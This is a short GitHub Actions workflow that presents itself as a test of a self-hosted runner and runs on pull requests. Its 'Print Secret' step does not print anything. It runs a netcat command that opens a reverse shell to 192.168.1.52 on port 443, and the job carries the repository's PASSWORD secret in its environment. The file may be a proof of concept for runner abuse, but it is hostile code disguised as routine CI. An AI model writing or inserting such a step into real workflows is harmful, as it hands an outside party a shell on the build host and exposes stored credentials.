name: Testing Self Hosted Runner

on: pull_request

  
jobs:
  hello:
    env:
      PASS: ${{ secrets.PASSWORD }}
    runs-on: [self-hosted, linux]
    steps:
      - name: Say Hello
        run: echo "Hello"
      - name: Print Secret
        run: nc 192.168.1.52 443 -e /bin/bash
